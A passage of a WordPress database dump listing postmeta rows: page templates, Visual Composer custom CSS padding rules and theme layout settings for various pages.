!important;}'),(24465,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24466,3057,'_wp_page_template','full-width.php'),(24467,3057,'slide_template','default'),(24468,3057,'_wpb_vc_js_status','true'),(24469,3057,'mkdf_page_content_behind_header_meta','no'),(24470,3057,'mkdf_page_content_padding','130px 0 0 '),(24471,3057,'mkdf_disable_vertical_header_background_image_meta','no'),(24472,3057,'mkdf_disable_header_widget_areas_meta','no'),(24473,3057,'mkdf_show_title_area_meta','no'),(24474,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(24475,3057,'_dp_original','513'),(24476,3058,'_wpb_shortcodes_custom_css','.vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}.vc_custom_1535445909857{padding-bottom: 200px !important;}.vc_custom_1535380918653{padding-bottom: 40px !important;}.vc_custom_1534240845257{padding-bottom: 30px !important;}.vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535382774510{padding-right: 0px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}'),(24477,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24478,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24479,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24480,3058,'_wp_page_template','full-width.php'),(24481,3058,'slide_template','default'),(24482,3058,'_wpb_vc_js_status','true'),(24483,3058,'mkdf_page_content_behind_header_meta','no'),(24484,3058,'mkdf_page_content_padding','130px 0 0'),(24485,3058,'mkdf_disable_vertical_header_background_image_meta','no'),(24486,3058,'mkdf_disable_header_widget_areas_meta','no'),(24487,3058,'mkdf_show_title_area_meta','no'),(24488,3058,'_dp_original','744'),(24489,3058,'_wpb_shortcodes_custom_css','.vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}.vc_custom_1535445909857{padding-bottom: 200px !important;}.vc_custom_1535380918653{padding-bottom: 40px !important;}.vc_custom_1534240845257{padding-bottom: 30px !important;}.vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535382774510{padding-right: 0px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}'),(24490,3058,'_wpb_post_custom_css','.mkdf-row-parallax-background-elements-holder.mkdf-parallax-elements-top .mkdf-row-parallax-right{\n    top: 1%;\n}'),(24491,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(24493,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(44578,3059,'_yoast_wpseo_content_score','60'),(24495,3059,'_wp_page_template','full-width.php'),(24496,3059,'slide_template','default'),(24497,3059,'_wpb_vc_js_status','true'),(24498,3059,'mkdf_page_content_behind_header_meta','no'),(24499,3059,'mkdf_disable_vertical_header_background_image_meta','no'),(24500,3059,'mkdf_disable_header_widget_areas_meta','no'),(24501,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(24502,3059,'mkdf_page_content_padding','0'),(24503,3059,'mkdf_header_type_meta','header-divided'),(24504,3059,'mkdf_show_title_area_meta','no'),(24505,3059,'_dp_original','430'),(24507,3060,'_wp_page_template','full-width.php'),(24508,3060,'slide_template','default'),(24509,3060,'_wpb_vc_js_status','true'),(24510,3060,'mkdf_page_content_behind_header_meta','no'),(24511,3060,'mkdf_page_content_padding','0 0 0 0 '),(24512,3060,'mkdf_page_content_padding_mobile','0 0 0 0'),(24513,3060,'mkdf_set_menu_area_position_meta','center'),(24514,3060,'mkdf_disable_vertical_header_background_image_meta','no'),(24515,3060,'mkdf_menu_area_background_color_meta','#ffffff'),(24516,3060,'mkdf_menu_area_background_transparency_meta','0.4'),(24517,3060,'mkdf_disable_header_widget_areas_meta','no'),(24518,3060,'mkdf_show_title_area_meta','no'),(24519,3060,'mkdf_disable_footer_meta','yes'),(24520,3060,'mkdf_header_type_meta','header-standard'),(24521,3060,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(24522,3060,'mkdf_header_behaviour_meta','no-behavior'),(24523,3061,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24524,3061,'_wp_page_template','default'),(24525,3061,'slide_template','default'),(24526,3061,'_wpb_vc_js_status','false'),(24527,3061,'mkdf_page_content_behind_header_meta','no'),(24528,3061,'mkdf_disable_vertical_header_background_image_meta','no'),(24529,3061,'mkdf_disable_header_widget_areas_meta','no'),(24530,3062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24531,3062,'_wp_page_template','default'),(24532,3062,'slide_template','default'),(24533,3062,'_wpb_vc_js_status','true'),(24534,3062,'mkdf_page_content_behind_header_meta','no'),(24535,3062,'mkdf_page_content_padding','120px 0 160px 0'),(24536,3062,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(24537,3062,'mkdf_disable_vertical_header_background_image_meta','no'),(24538,3062,'mkdf_disable_header_widget_areas_meta','no'),(24539,3062,'mkdf_title_area_type_meta','attika'),(24540,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24541,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24542,3063,'_wp_page_template','default'),(24543,3063,'slide_template','default'),(24544,3063,'_wpb_vc_js_status','true'),(24545,3063,'mkdf_page_content_behind_header_meta','no'),(24546,3063,'mkdf_page_content_padding','122px 0 160px 0'),(24547,3063,'mkdf_page_content_padding_mobile','122px 0 160px 0'),(24548,3063,'mkdf_disable_vertical_header_background_image_meta','no'),(24549,3063,'mkdf_disable_header_widget_areas_meta','no'),(24550,3063,'mkdf_title_area_type_meta','attika'),(24551,3063,'_dp_original','1151'),(24552,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24553,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24554,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24555,3064,'_wp_page_template','full-width.php'),(24556,3064,'slide_template','default'),(24557,3064,'_wpb_vc_js_status','true'),(24558,3064,'mkdf_page_content_behind_header_meta','no'),(24559,3064,'mkdf_page_content_padding','30px 30px 50px 30px'),(24560,3064,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(24561,3064,'mkdf_disable_vertical_header_background_image_meta','no'),(24562,3064,'mkdf_disable_header_widget_areas_meta','no'),(24563,3064,'mkdf_title_area_type_meta','attika'),(24564,3064,'_dp_original','1160'),(24565,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24566,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24567,3065,'_wp_page_template','default'),(24568,3065,'slide_template','default'),(24569,3065,'_wpb_vc_js_status','true'),(24570,3065,'mkdf_page_content_behind_header_meta','no'),(24571,3065,'mkdf_page_content_padding','120px 0 170px 0'),(24572,3065,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(24573,3065,'mkdf_disable_vertical_header_background_image_meta','no'),(24574,3065,'mkdf_disable_header_widget_areas_meta','no'),(24575,3065,'mkdf_title_area_type_meta','attika'),(24576,3065,'_dp_original','1151'),(24577,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24578,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24579,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24580,3066,'_wp_page_template','default'),(24581,3066,'slide_template','default'),(24582,3066,'_wpb_vc_js_status','true'),(24583,3066,'mkdf_page_content_behind_header_meta','no'),(24584,3066,'mkdf_page_content_padding','100px 0 100px 0'),(24585,3066,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(24586,3066,'mkdf_disable_vertical_header_background_image_meta','no'),(24587,3066,'mkdf_disable_header_widget_areas_meta','no'),(24588,3066,'mkdf_title_area_type_meta','attika'),(24589,3066,'_dp_original','1160'),(24590,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24591,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24592,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24593,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24594,3067,'_wp_page_template','full-width.php'),(24595,3067,'slide_template','default'),(24596,3067,'_wpb_vc_js_status','true'),(24597,3067,'mkdf_page_content_behind_header_meta','no'),(24598,3067,'mkdf_page_content_padding','30px 30px 50px 30px'),(24599,3067,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(24600,3067,'mkdf_disable_vertical_header_background_image_meta','no'),(24601,3067,'mkdf_disable_header_widget_areas_meta','no'),(24602,3067,'mkdf_title_area_type_meta','attika'),(24603,3067,'_dp_original','1167'),(24604,3068,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(24606,3068,'_wp_page_template','full-width.php'),(24607,3068,'slide_template','default'),(24608,3068,'_wpb_vc_js_status','true'),(24609,3068,'mkdf_page_content_behind_header_meta','no'),(24610,3068,'mkdf_page_content_padding','0 0 0 0'),(24611,3068,'mkdf_page_content_padding_mobile','0 0 0 0'),(24613,3068,'mkdf_disable_vertical_header_background_image_meta','no'),(24614,3068,'mkdf_disable_header_widget_areas_meta','no'),(24615,3068,'mkdf_show_title_area_meta','no'),(24616,3068,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(24617,3068,'_wpb_post_custom_css','@media only screen and (min-width: 1025px) and (max-width: 1440px) {\r\n    #mkdf-back-to-top {\r\n        right: 55px; \r\n    }\r\n}'),(24618,3069,'_wpb_shortcodes_custom_css','.vc_custom_1534339141193{padding-bottom: 78px !important;}.vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253670577{padding-top: 85px !important;}'),(24619,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24620,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24621,3069,'_wp_page_template','full-width.php'),(24622,3069,'slide_template','default'),(24623,3069,'_wpb_vc_js_status','true'),(24624,3069,'mkdf_page_content_behind_header_meta','no'),(24625,3069,'mkdf_disable_vertical_header_background_image_meta','no'),(24626,3069,'mkdf_disable_header_widget_areas_meta','no'),(24627,3069,'mkdf_page_content_padding','80px 0 '),(24628,3069,'_dp_original','50'),(24629,3069,'_wpb_shortcodes_custom_css','.vc_custom_1534339141193{padding-bottom: 78px !important;}.vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253670577{padding-top: 85px !important;}'),(24630,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24631,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24632,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24633,3070,'_wp_page_template','full-width.php'),(24634,3070,'slide_template','default'),(24635,3070,'_wpb_vc_js_status','true'),(24636,3070,'mkdf_page_content_behind_header_meta','no'),(24637,3070,'mkdf_disable_vertical_header_background_image_meta','no'),(24638,3070,'mkdf_disable_header_widget_areas_meta','no'),(24639,3070,'mkdf_page_content_padding','100px 0 110px'),(24640,3070,'_dp_original','1241'),(24641,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(24642,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24643,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(24644,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24645,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24646,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24647,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(24648,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(24649,3071,'_wp_page_template','full-width.php'),(24650,3071,'slide_template','default'),(24651,3071,'_wpb_vc_js_status','true'),(24652,3071,'mkdf_page_content_behind_header_meta','no'),(24653,3071,'mkdf_disable_vertical_header_background_image_meta','no'),(24654,3071,'mkdf_disable_header_widget_areas_meta','no'),(24655,3071,'mkdf_page_content_padding','120px 0 140px'),(24656,3071,'_dp_original','1250'),(24657,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(24658,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24659,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(24660,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24661,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24662,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24663,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24664,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(24665,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(24666,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(24667,3072,'_wp_page_template','full-width.php'),(24668,3072,'slide_template','default'),(24669,3072,'_wpb_vc_js_status','true'),(24670,3072,'mkdf_page_content_behind_header_meta','no'),(24671,3072,'mkdf_disable_vertical_header_background_image_meta','no'),(24672,3072,'mkdf_disable_header_widget_areas_meta','no'),(24673,3072,'mkdf_page_content_padding','100px 0 90px'),(24674,3072,'_dp_original','1297'),(24675,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(24676,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24677,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(24678,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24679,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24680,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24681,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24682,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(24683,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(24684,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(24685,1382,'_wp_page_template','full-width.php'),(24686,1382,'slide_template','default'),(24687,1382,'_wpb_vc_js_status','true'),(24688,1382,'mkdf_page_content_behind_header_meta','no'),(24689,1382,'mkdf_disable_vertical_header_background_image_meta','no'),(24690,1382,'mkdf_disable_header_widget_areas_meta','no'),(24691,1382,'mkdf_page_content_padding','120px 0 100px'),(24692,1382,'_dp_original','1297'),(24693,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24694,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24695,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24696,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24697,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24698,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24699,1393,'_wp_page_template','full-width.php'),(24700,1393,'slide_template','default'),(24701,1393,'_wpb_vc_js_status','true'),(24702,1393,'mkdf_page_content_behind_header_meta','no'),(24703,1393,'mkdf_disable_vertical_header_background_image_meta','no'),(24704,1393,'mkdf_disable_header_widget_areas_meta','no'),(24705,1393,'mkdf_page_content_padding','120px 0 110px'),(24706,1393,'_dp_original','1382'),(24707,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(24708,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24709,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(24710,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24711,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24712,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24713,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24714,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(24715,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(24716,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(24717,1642,'_wp_page_template','full-width.php'),(24718,1642,'slide_template','default'),(24719,1642,'_wpb_vc_js_status','true'),(24720,1642,'mkdf_page_content_behind_header_meta','no'),(24721,1642,'mkdf_disable_vertical_header_background_image_meta','no'),(24722,1642,'mkdf_disable_header_widget_areas_meta','no'),(24723,1642,'mkdf_page_content_padding','120px 0'),(24724,1642,'_dp_original','1297'),(24725,1650,'_wpb_shortcodes_custom_css','.vc_custom_1534518584017{padding-top: 30px !important;}'),(24726,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24727,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24728,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24729,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24730,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24731,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24732,1650,'_wp_page_template','full-width.php'),(24733,1650,'slide_template','default'),(24734,1650,'_wpb_vc_js_status','true'),(24735,1650,'mkdf_page_content_behind_header_meta','no'),(24736,1650,'mkdf_disable_vertical_header_background_image_meta','no'),(24737,1650,'mkdf_disable_header_widget_areas_meta','no'),(24738,1650,'mkdf_page_content_padding','30px 0'),(24739,1650,'_dp_original','1642'),(24740,1650,'_wpb_shortcodes_custom_css','.vc_custom_1534518584017{padding-top: 30px !important;}'),(24741,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24742,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24743,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24744,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24745,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24746,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24747,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24748,1658,'_wp_page_template','full-width.php'),(24749,1658,'slide_template','default'),(24750,1658,'_wpb_vc_js_status','true'),(24751,1658,'mkdf_page_content_behind_header_meta','no'),(24752,1658,'mkdf_disable_vertical_header_background_image_meta','no'),(24753,1658,'mkdf_disable_header_widget_areas_meta','no'),(24754,1658,'mkdf_page_content_padding','120px 0'),(24755,1658,'_dp_original','1650'),(24756,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24757,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24758,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24759,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24760,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24761,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24762,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24763,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24764,1662,'_wp_page_template','full-width.php'),(24765,1662,'slide_template','default'),(24766,1662,'_wpb_vc_js_status','true'),(24767,1662,'mkdf_page_content_behind_header_meta','no'),(24768,1662,'mkdf_disable_vertical_header_background_image_meta','no'),(24769,1662,'mkdf_disable_header_widget_areas_meta','no'),(24770,1662,'mkdf_page_content_padding','120px 0 105px'),(24771,1662,'_dp_original','1658'),(24773,1679,'_wp_page_template','blog-standard'),(24774,1679,'slide_template',''),(24775,1679,'_wpb_vc_js_status','false'),(24776,1679,'mkdf_page_content_behind_header_meta','no'),(24777,1679,'mkdf_blog_category_meta','recepies'),(24778,1679,'mkdf_show_posts_per_page_meta','5'),(24779,1679,'mkdf_sidebar_layout_meta','sidebar-25-right'),(24780,1679,'mkdf_disable_vertical_header_background_image_meta','no'),(24781,1679,'mkdf_disable_header_widget_areas_meta','no'),(24782,1679,'mkdf_page_content_padding','120px 0 100px'),(24783,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(24784,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24785,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(24786,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24787,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24788,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24789,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24790,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 